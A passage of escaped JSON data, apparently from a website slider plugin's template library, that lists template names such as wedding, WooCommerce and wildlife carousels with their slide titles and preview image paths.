4\",\"img\":\"rockable-detail-modal\\/slide1.jpg\"},{\"title\":\"Slide 5\",\"img\":\"rockable-detail-modal\\/slide1.jpg\"},{\"title\":\"Slide 6\",\"img\":\"rockable-detail-modal\\/slide1.jpg\"},{\"title\":\"Slide 7\",\"img\":\"rockable-detail-modal\\/slide1.jpg\"},{\"title\":\"Slide 8\",\"img\":\"rockable-detail-modal\\/slide1.jpg\"},{\"title\":\"Slide 9\",\"img\":\"rockable-detail-modal\\/slide1.jpg\"},{\"title\":\"Slide 10\",\"img\":\"rockable-detail-modal\\/slide1.jpg\"},{\"title\":\"Slide 11\",\"img\":\"rockable-detail-modal\\/slide1.jpg\"},{\"title\":\"Slide 12\",\"img\":\"rockable-detail-modal\\/slide1.jpg\"},{\"title\":\"Slide 13\",\"img\":\"rockable-detail-modal\\/slide1.jpg\"},{\"title\":\"Slide 14\",\"img\":\"rockable-detail-modal\\/slide1.jpg\"},{\"title\":\"Slide 15\",\"img\":\"rockable-detail-modal\\/slide1.jpg\"},{\"title\":\"Slide 16\",\"img\":\"rockable-detail-modal\\/slide1.jpg\"},{\"title\":\"Slide 17\",\"img\":\"rockable-detail-modal\\/slide1.jpg\"},{\"title\":\"Slide 18\",\"img\":\"rockable-detail-modal\\/slide1.jpg\"}],\"rockable-detail-modal-2\":[{\"title\":\"Slide 1\",\"img\":\"rockable-detail-modal-2\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"rockable-detail-modal-2\\/slide1.jpg\"},{\"title\":\"Slide 3\",\"img\":\"rockable-detail-modal-2\\/slide1.jpg\"},{\"title\":\"Slide 4\",\"img\":\"rockable-detail-modal-2\\/slide1.jpg\"},{\"title\":\"Slide 5\",\"img\":\"rockable-detail-modal-2\\/slide1.jpg\"},{\"title\":\"Slide 6\",\"img\":\"rockable-detail-modal-2\\/slide1.jpg\"},{\"title\":\"Slide 7\",\"img\":\"rockable-detail-modal-2\\/slide1.jpg\"},{\"title\":\"Slide 8\",\"img\":\"rockable-detail-modal-2\\/slide1.jpg\"},{\"title\":\"Slide 9\",\"img\":\"rockable-detail-modal-2\\/slide1.jpg\"},{\"title\":\"Slide 10\",\"img\":\"rockable-detail-modal-2\\/slide1.jpg\"},{\"title\":\"Slide 11\",\"img\":\"rockable-detail-modal-2\\/slide1.jpg\"},{\"title\":\"Slide 12\",\"img\":\"rockable-detail-modal-2\\/slide1.jpg\"},{\"title\":\"Slide 13\",\"img\":\"rockable-detail-modal-2\\/slide1.jpg\"},{\"title\":\"Slide 14\",\"img\":\"rockable-detail-modal-2\\/slide1.jpg\"},{\"title\":\"Slide 15\",\"img\":\"rockable-detail-modal-2\\/slide1.jpg\"},{\"title\":\"Slide 16\",\"img\":\"rockable-detail-modal-2\\/slide1.jpg\"},{\"title\":\"Slide 17\",\"img\":\"rockable-detail-modal-2\\/slide1.jpg\"},{\"title\":\"Slide 18\",\"img\":\"rockable-detail-modal-2\\/slide1.jpg\"}],\"real-estate-showcase-slider\":[{\"title\":\"Slide 1\",\"img\":\"Real-Estate-Showcase-Slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Real-Estate-Showcase-Slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Real-Estate-Showcase-Slider\\/slide3.jpg\"}],\"isometric-slider\":[{\"title\":\"Slide 1\",\"img\":\"isometric-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"isometric-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"isometric-slider\\/slide3.jpg\"}],\"E-Commerce-Slider\":[{\"title\":\"Slide 1\",\"img\":\"Shoes-Store-Slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Shoes-Store-Slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Shoes-Store-Slider\\/slide3.jpg\"}],\"E-Commerce-Slider-Modal\":[{\"title\":\"Slide 1\",\"img\":\"Shoes-Store-Slider-Modal\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Shoes-Store-Slider-Modal\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Shoes-Store-Slider-Modal\\/slide3.jpg\"}],\"Woo-Commerce-Slider-Dynamic\":[{\"title\":\"Slide 1\",\"img\":\"Shoes-Store-Slider-Dynamic\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Shoes-Store-Slider-Dynamic\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Shoes-Store-Slider-Dynamic\\/slide3.jpg\"}],\"blooming-header\":[{\"title\":\"Slide 1\",\"img\":\"blooming-header\\/slide1.jpg\"}],\"blooming-about\":[{\"title\":\"Slide 1\",\"img\":\"blooming-about\\/slide1.jpg\"}],\"blooming-portfolio\":[{\"title\":\"Slide 1\",\"img\":\"blooming-portfolio\\/slide1.jpg\"}],\"blooming-wedding-title\":[{\"title\":\"Slide 1\",\"img\":\"blooming-wedding-title\\/slide1.jpg\"}],\"blooming-wedding-carousel\":[{\"title\":\"Slide 1\",\"img\":\"blooming-wedding-carousel\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"blooming-wedding-carousel\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"blooming-wedding-carousel\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"blooming-wedding-carousel\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"blooming-wedding-carousel\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"blooming-wedding-carousel\\/slide6.jpg\"}],\"blooming-wedding-text\":[{\"title\":\"Slide 1\",\"img\":\"blooming-wedding-text\\/slide1.jpg\"}],\"blooming-parties-title\":[{\"title\":\"Slide 1\",\"img\":\"blooming-parties-title\\/slide1.jpg\"}],\"blooming-parties-carousel\":[{\"title\":\"Slide 1\",\"img\":\"blooming-parties-carousel\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"blooming-parties-carousel\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"blooming-parties-carousel\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"blooming-parties-carousel\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"blooming-parties-carousel\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"blooming-parties-carousel\\/slide6.jpg\"}],\"blooming-parties-text\":[{\"title\":\"Slide 1\",\"img\":\"blooming-parties-text\\/slide1.jpg\"}],\"blooming-funeral-title\":[{\"title\":\"Slide 1\",\"img\":\"blooming-funeral-title\\/slide1.jpg\"}],\"blooming-funeral-slider\":[{\"title\":\"Slide 1\",\"img\":\"blooming-funeral-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"blooming-funeral-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"blooming-funeral-slider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"blooming-funeral-slider\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"blooming-funeral-slider\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"blooming-funeral-slider\\/slide6.jpg\"}],\"blooming-funeral-text\":[{\"title\":\"Slide 1\",\"img\":\"blooming-funeral-text\\/slide1.jpg\"}],\"blooming-contact\":[{\"title\":\"Slide 1\",\"img\":\"blooming-contact\\/slide1.jpg\"}],\"particle-hero\":[{\"title\":\"Slide 1\",\"img\":\"particle-hero\\/slide1.jpg\"}],\"bubble-morph-hero\":[{\"title\":\"Slide 1\",\"img\":\"bubble-morph-hero\\/slide1.jpg\"}],\"parallax-hero\":[{\"title\":\"Slide 1\",\"img\":\"parallax-hero\\/slide1.jpg\"}],\"video-hero\":[{\"title\":\"Slide 1\",\"img\":\"video-hero\\/slide1.jpg\"}],\"ken-burns-hero\":[{\"title\":\"Slide 1\",\"img\":\"ken-burns-hero\\/slide1.jpg\"}],\"basic-hero-collection\":[{\"title\":\"Slide 1\",\"img\":\"basic-hero-collection\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"basic-hero-collection\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"basic-hero-collection\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"basic-hero-collection\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"basic-hero-collection\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"basic-hero-collection\\/slide6.jpg\"}],\"launching-very-soon\":[{\"title\":\"Slide 1\",\"img\":\"launching-very-soon\\/slide1.jpg\"}],\"Under-Construction\":[{\"title\":\"Slide 1\",\"img\":\"Under-Construction\\/slide1.jpg\"}],\"Particle-Effect\":[{\"title\":\"Slide 1\",\"img\":\"Particle-Effect\\/slide1.jpg\"}],\"Particle-Effect-2\":[{\"title\":\"Slide 1\",\"img\":\"Particle-Effect-2\\/slide1.jpg\"}],\"stark-menu\":[{\"title\":\"Slide 1\",\"img\":\"stark-menu\\/slide1.jpg\"}],\"stark-header\":[{\"title\":\"Slide 1\",\"img\":\"stark-header\\/slide1.jpg\"}],\"stark-content\":[{\"title\":\"Slide 1\",\"img\":\"stark-content\\/slide1.jpg\"}],\"stark-carousel\":[{\"title\":\"Slide 1\",\"img\":\"stark-carousel\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"stark-carousel\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"stark-carousel\\/slide3.jpg\"}],\"stark-portfolio\":[{\"title\":\"Slide 1\",\"img\":\"stark-portfolio\\/slide1.jpg\"}],\"stark-portfolio-detail\":[{\"title\":\"Slide 1\",\"img\":\"stark-portfolio-detail\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"stark-portfolio-detail\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"stark-portfolio-detail\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"stark-portfolio-detail\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"stark-portfolio-detail\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"stark-portfolio-detail\\/slide6.jpg\"}],\"stark-contact\":[{\"title\":\"Slide 1\",\"img\":\"stark-contact\\/slide1.jpg\"}],\"stark-footer\":[{\"title\":\"Slide 1\",\"img\":\"stark-footer\\/slide1.jpg\"}],\"stark-newsletter\":[{\"title\":\"Slide 1\",\"img\":\"stark-newsletter\\/slide1.jpg\"}],\"big-summer-sale\":[{\"title\":\"Slide 1\",\"img\":\"big-summer-sale\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"big-summer-sale\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"big-summer-sale\\/slide3.jpg\"}],\"traveller-carousel\":[{\"title\":\"Slide 1\",\"img\":\"traveller-carousel\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"traveller-carousel\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"traveller-carousel\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"traveller-carousel\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"traveller-carousel\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"traveller-carousel\\/slide6.jpg\"}],\"project-carousel\":[{\"title\":\"Slide 1\",\"img\":\"project-carousel\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"project-carousel\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"project-carousel\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"project-carousel\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"project-carousel\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"project-carousel\\/slide6.jpg\"},{\"title\":\"Slide 7\",\"img\":\"project-carousel\\/slide7.jpg\"}],\"news-carousel\":[{\"title\":\"Slide 1\",\"img\":\"news-carousel\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"news-carousel\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"news-carousel\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"news-carousel\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"news-carousel\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"news-carousel\\/slide6.jpg\"},{\"title\":\"Slide 7\",\"img\":\"news-carousel\\/slide7.jpg\"},{\"title\":\"Slide 8\",\"img\":\"news-carousel\\/slide8.jpg\"}],\"story-menu\":[{\"title\":\"Slide 1\",\"img\":\"story-menu\\/slide1.jpg\"}],\"story-header\":[{\"title\":\"Slide 1\",\"img\":\"story-header\\/slide1.jpg\"}],\"story-block-1\":[{\"title\":\"Slide 1\",\"img\":\"story-block-1\\/slide1.jpg\"}],\"story-content-1\":[{\"title\":\"Slide 1\",\"img\":\"story-content-1\\/slide1.jpg\"}],\"story-block-2\":[{\"title\":\"Slide 1\",\"img\":\"story-block-2\\/slide1.jpg\"}],\"story-block-3\":[{\"title\":\"Slide 1\",\"img\":\"story-block-3\\/slide1.jpg\"}],\"story-content-2\":[{\"title\":\"Slide 1\",\"img\":\"story-content-2\\/slide1.jpg\"}],\"story-block-4\":[{\"title\":\"Slide 1\",\"img\":\"story-block-4\\/slide1.jpg\"}],\"story-content-3\":[{\"title\":\"Slide 1\",\"img\":\"story-content-3\\/slide1.jpg\"}],\"mini-website\":[{\"title\":\"Slide 1\",\"img\":\"mini-website\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"mini-website\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"mini-website\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"mini-website\\/slide4.jpg\"}],\"food-delivery\":[{\"title\":\"Slide 1\",\"img\":\"food-delivery\\/slide1.jpg\"}],\"slider-with-illustrations\":[{\"title\":\"Slide 1\",\"img\":\"slider-with-illustrations\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"slider-with-illustrations\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"slider-with-illustrations\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"slider-with-illustrations\\/slide4.jpg\"}],\"zen-menu\":[{\"title\":\"Slide 1\",\"img\":\"zen-menu\\/slide1.jpg\"}],\"zen-header\":[{\"title\":\"Slide 1\",\"img\":\"zen-header\\/slide1.jpg\"}],\"zen-about\":[{\"title\":\"Slide 1\",\"img\":\"zen-about\\/slide1.jpg\"}],\"zen-features\":[{\"title\":\"Slide 1\",\"img\":\"zen-features\\/slide1.jpg\"}],\"zen-video\":[{\"title\":\"Slide 1\",\"img\":\"zen-video\\/slide1.jpg\"}],\"zen-pricing\":[{\"title\":\"Slide 1\",\"img\":\"zen-pricing\\/slide1.jpg\"}],\"zen-testimonials-title\":[{\"title\":\"Slide 1\",\"img\":\"zen-testimonials-title\\/slide1.jpg\"}],\"zen-testimonials\":[{\"title\":\"Slide 1\",\"img\":\"zen-testimonials\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"zen-testimonials\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"zen-testimonials\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"zen-testimonials\\/slide4.jpg\"}],\"zen-footer\":[{\"title\":\"Slide 1\",\"img\":\"zen-footer\\/slide1.jpg\"}],\"Paintbrush-Effect\":[{\"title\":\"Slide 1\",\"img\":\"Paintbrush-Effect\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Paintbrush-Effect\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Paintbrush-Effect\\/slide3.jpg\"}],\"Photographer-Header\":[{\"title\":\"Slide 1\",\"img\":\"Photographer-Header\\/slide1.jpg\"}],\"Photographer-Welcome-Screen\":[{\"title\":\"Slide 1\",\"img\":\"Photographer-Welcome-Screen\\/slide1.jpg\"}],\"Photographer-Showcase\":[{\"title\":\"Slide 1\",\"img\":\"Photographer-Showcase\\/slide1.jpg\"}],\"Photographer-Portfolio\":[{\"title\":\"Slide 1\",\"img\":\"Photographer-Portfolio\\/slide1.jpg\"}],\"Photographer-Contacts\":[{\"title\":\"Slide 1\",\"img\":\"Photographer-Contacts\\/slide1.jpg\"}],\"Photographer-Footer\":[{\"title\":\"Slide 1\",\"img\":\"Photographer-Footer\\/slide1.jpg\"}],\"Photographer-Modal\":[{\"title\":\"Slider 1\",\"img\":\"Photographer-Modal\\/slide1.jpg\"}],\"black-friday-scroll-video\":[{\"title\":\"Slide 1\",\"img\":\"black-friday-scroll-video\\/slide1.jpg\"}],\"charity-menu\":[{\"title\":\"Slide 1\",\"img\":\"charity-menu\\/slide1.jpg\"}],\"charity-header\":[{\"title\":\"Slide 1\",\"img\":\"charity-header\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"charity-header\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"charity-header\\/slide3.jpg\"}],\"charity-mission\":[{\"title\":\"Slide 1\",\"img\":\"charity-mission\\/slide1.jpg\"}],\"charity-funds\":[{\"title\":\"Slide 1\",\"img\":\"charity-funds\\/slide1.jpg\"}],\"charity-success\":[{\"title\":\"Slide 1\",\"img\":\"charity-success\\/slide1.jpg\"}],\"charity-stories\":[{\"title\":\"Slide 1\",\"img\":\"charity-stories\\/slide1.jpg\"}],\"charity-worldmap\":[{\"title\":\"Slide 1\",\"img\":\"charity-worldmap\\/slide1.jpg\"}],\"charity-large-image\":[{\"title\":\"Slide 1\",\"img\":\"charity-large-image\\/slide1.jpg\"}],\"charity-sponsors\":[{\"title\":\"Slide 1\",\"img\":\"charity-sponsors\\/slide1.jpg\"}],\"charity-help\":[{\"title\":\"Slide 1\",\"img\":\"charity-help\\/slide1.jpg\"}],\"charity-footer\":[{\"title\":\"Slide 1\",\"img\":\"charity-footer\\/slide1.jpg\"}],\"cinematic-hero-titles\":[{\"title\":\"Slide 1\",\"img\":\"cinematic-hero-titles\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"cinematic-hero-titles\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"cinematic-hero-titles\\/slide3.jpg\"}],\"design-dna-scroll-video\":[{\"title\":\"Slide 1\",\"img\":\"design-dna-scroll-video\\/slide1.jpg\"}],\"food-delivery-lottie-scroll\":[{\"title\":\"Slide 1\",\"img\":\"food-delivery-lottie-scroll\\/slide1.jpg\"}],\"food-recipe-carousel\":[{\"title\":\"Slide 1\",\"img\":\"food-recipe-carousel\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"food-recipe-carousel\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"food-recipe-carousel\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"food-recipe-carousel\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"food-recipe-carousel\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"food-recipe-carousel\\/slide6.jpg\"}],\"food-recipe-modal\":[{\"title\":\"Slide 1\",\"img\":\"food-recipe-modal\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"food-recipe-modal\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"food-recipe-modal\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"food-recipe-modal\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"food-recipe-modal\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"food-recipe-modal\\/slide6.jpg\"}],\"corporate-carousel-template\":[{\"title\":\"Slide 1\",\"img\":\"packages\\/corporate_carousel_bundle.jpg\"}],\"corporate-carousel\":[{\"title\":\"Slide 1\",\"img\":\"corporate-carousel\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"corporate-carousel\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"corporate-carousel\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"corporate-carousel\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"corporate-carousel\\/slide5.jpg\"}],\"corporate-lightbox\":[{\"title\":\"Slide 1\",\"img\":\"corporate-lightbox\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"corporate-lightbox\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"corporate-lightbox\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"corporate-lightbox\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"corporate-lightbox\\/slide5.jpg\"}],\"cyber-carousel-template\":[{\"title\":\"Slide 1\",\"img\":\"packages\\/cybercarousel_bundle.jpg\"}],\"cyber-carousel\":[{\"title\":\"Slide 1\",\"img\":\"cyber-carousel\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"cyber-carousel\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"cyber-carousel\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"cyber-carousel\\/slide4.jpg\"}],\"cyber-carousel-lightbox\":[{\"title\":\"Slide 1\",\"img\":\"cyber-carousel-lightbox\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"cyber-carousel-lightbox\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"cyber-carousel-lightbox\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"cyber-carousel-lightbox\\/slide4.jpg\"}],\"woocommerce-carousel-one\":[{\"title\":\"Slide 1\",\"img\":\"woocommerce-carousel-one\\/slide1.jpg\"}],\"woocommerce-carousel-one-static\":[{\"title\":\"Slide 1\",\"img\":\"woocommerce-carousel-one-static\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"woocommerce-carousel-one-static\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"woocommerce-carousel-one-static\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"woocommerce-carousel-one-static\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"woocommerce-carousel-one-static\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"woocommerce-carousel-one-static\\/slide6.jpg\"}],\"woocommerce-carousel-two\":[{\"title\":\"Slide 1\",\"img\":\"woocommerce-carousel-two\\/slide1.jpg\"}],\"woocommerce-carousel-two-static\":[{\"title\":\"Slide 1\",\"img\":\"woocommerce-carousel-two-static\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"woocommerce-carousel-two-static\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"woocommerce-carousel-two-static\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"woocommerce-carousel-two-static\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"woocommerce-carousel-two-static\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"woocommerce-carousel-two-static\\/slide6.jpg\"}],\"woocommerce-feature-slider\":[{\"title\":\"Slide 1\",\"img\":\"woocommerce-feature-slider\\/slide1.jpg\"}],\"woocommerce-feature-slider-static\":[{\"title\":\"Slide 1\",\"img\":\"woocommerce-feature-slider-static\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"woocommerce-feature-slider-static\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"woocommerce-feature-slider-static\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"woocommerce-feature-slider-static\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"woocommerce-feature-slider-static\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"woocommerce-feature-slider-static\\/slide6.jpg\"}],\"woo-liquid-slider\":[{\"title\":\"Slide 1\",\"img\":\"woo-liquid-slider\\/slide1.jpg\"}],\"woocommerce-liquid-slider-static\":[{\"title\":\"Slide 1\",\"img\":\"woocommerce-liquid-slider-static\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"woocommerce-liquid-slider-static\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"woocommerce-liquid-slider-static\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"woocommerce-liquid-slider-static\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"woocommerce-liquid-slider-static\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"woocommerce-liquid-slider-static\\/slide6.jpg\"}],\"woo-slider-pack\":[{\"title\":\"Slide 1\",\"img\":\"packages\\/woosliderpack_dynamic.jpg\"}],\"woo-slider-pack-static\":[{\"title\":\"Slide 1\",\"img\":\"packages\\/woosliderpack_static.jpg\"}],\"creative-hero-collection\":[{\"title\":\"Slide 1\",\"img\":\"creative-hero-collection\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"creative-hero-collection\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"creative-hero-collection\\/slide3.jpg\"}],\"photographer-slider\":[{\"title\":\"Slide 1\",\"img\":\"photographer-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"photographer-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"photographer-slider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"photographer-slider\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"photographer-slider\\/slide5.jpg\"}],\"realestate-slider\":[{\"title\":\"Slide 1\",\"img\":\"realestate-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"realestate-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"realestate-slider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"realestate-slider\\/slide4.jpg\"}],\"saas-product-slider\":[{\"title\":\"Slide 1\",\"img\":\"saas-product-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"saas-product-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"saas-product-slider\\/slide3.jpg\"}],\"cinematic-wildlife-template\":[{\"title\":\"Slide 1\",\"img\":\"packages\\/cinematic-wildlife-package.jpg\"}],\"cinematic-wildlife-slider\":[{\"title\":\"Slide 1\",\"img\":\"cinematic-wildlife-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"cinematic-wildlife-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"cinematic-wildlife-slider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"cinematic-wildlife-slider\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"cinematic-wildlife-slider\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"cinematic-wildlife-slider\\/slide6.jpg\"},{\"title\":\"Slide 7\",\"img\":\"cinematic-wildlife-slider\\/slide7.jpg\"}],\"cinematic-wildlife-modal\":[{\"title\":\"Slide 1\",\"img\":\"cinematic-wildlife-modal\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"cinematic-wildlife-modal\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"cinematic-wildlife-modal\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"cinematic-wildlife-modal\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"cinematic-wildlife-modal\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"cinematic-wildlife-modal\\/slide6.jpg\"},{\"title\":\"Slide 7\",\"img\":\"cinematic-wildlife-modal\\/slide7.jpg\"}],\"gaming-stats-presentation-slider\":[{\"title\":\"Slide 1\",\"img\":\"gaming-stats-presentation-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"gaming-stats-presentation-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"gaming-stats-presentation-slider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"gaming-stats-presentation-slider\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"gaming-stats-presentation-slider\\/slide5.jpg\"}],\"coffee-flavours\":[{\"title\":\"Slide 1\",\"img\":\"coffee-flavors\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"coffee-flavors\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"coffee-flavors\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"coffee-flavors\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"coffee-flavors\\/slide5.jpg\"}],\"showreel-slider\":[{\"title\":\"Slide 1\",\"img\":\"showreel-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"showreel-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"showreel-slider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"showreel-slider\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"showreel-slider\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"showreel-slider\\/slide6.jpg\"},{\"title\":\"Slide 7\",\"img\":\"showreel-slider\\/slide7.jpg\"},{\"title\":\"Slide 8\",\"img\":\"showreel-slider\\/slide8.jpg\"},{\"title\":\"Slide 9\",\"img\":\"showreel-slider\\/slide9.jpg\"},{\"title\":\"Slide 10\",\"img\":\"showreel-slider\\/slide10.jpg\"}],\"visual-art-forms\":[{\"title\":\"Slide 1\",\"img\":\"visual-art-forms\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"visual-art-forms\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"visual-art-forms\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"visual-art-forms\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"visual-art-forms\\/slide5.jpg\"}],\"bg-effect-hero\":[{\"title\":\"Slide 